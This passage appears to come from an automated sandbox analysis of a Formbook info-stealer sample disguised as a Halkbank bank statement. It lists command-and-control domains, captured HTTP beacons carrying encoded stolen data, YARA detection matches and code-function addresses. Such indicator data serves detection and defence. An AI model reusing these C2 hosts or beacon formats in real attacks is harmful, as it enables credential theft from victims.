          Source: systray.exe, 00000005.00000002.578396952.0000000006FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/?Azs=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8h
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581575436.00000000063DC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581575436.00000000063DC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com/ghii/
          Source: -912K03JO.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -912K03JO.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: systray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
          Source: -912K03JO.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: systray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -912K03JO.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000004.00000002.589912839.00000000159CA000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000005.00000002.578058583.0000000004E7A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
          Source: systray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: systray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: systray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: systray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: systray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 7a 73 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 28 69 52 73 42 59 28 32 49 36 46 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Azs=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(iRsBY(2I6FODv6UUA).
          Source: unknownDNS traffic detected: queries for: www.wenzid4.top
          Source: global trafficHTTP traffic detected: GET /ghii/?Azs=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==&OGpK-=bVTY_sdT7 HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Azs=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw==&OGpK-=bVTY_sdT7 HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 3.2.jmaxbgpy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jmaxbgpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 3.2.jmaxbgpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.jmaxbgpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.jmaxbgpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.jmaxbgpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.jmaxbgpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.jmaxbgpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.jmaxbgpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.jmaxbgpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_008A08B71_2_008A08B7
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_008A0A3B1_2_008A0A3B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_004058033_2_00405803
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_004038833_2_00403883
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00401B603_2_00401B60
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00421B3F3_2_00421B3F
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00401C703_2_00401C70
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_004055E23_2_004055E2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_004055E33_2_004055E3
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_004206D33_2_004206D3
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_004017C03_2_004017C0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0040BFCE3_2_0040BFCE
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0040BFD33_2_0040BFD3
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0040BF8D3_2_0040BF8D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_004017B33_2_004017B3
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE20A03_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B820A83_2_00B820A8
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACB0903_2_00ACB090
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B828EC3_2_00B828EC
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B8E8243_2_00B8E824
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B710023_2_00B71002
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD41203_2_00AD4120
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABF9003_2_00ABF900
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B822AE3_2_00B822AE
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B6FA2B3_2_00B6FA2B
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEEBB03_2_00AEEBB0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7DBD23_2_00B7DBD2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B703DA3_2_00B703DA
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B82B283_2_00B82B28
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC841F3_2_00AC841F
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7D4663_2_00B7D466
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE25813_2_00AE2581
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACD5E03_2_00ACD5E0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B825DD3_2_00B825DD
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB0D203_2_00AB0D20
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B82D073_2_00B82D07
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B81D553_2_00B81D55
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B82EF73_2_00B82EF7
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD6E303_2_00AD6E30
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7D6163_2_00B7D616
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B81FF13_2_00B81FF1
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B8DFCE3_2_00B8DFCE
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: String function: 00ABB150 appears 45 times
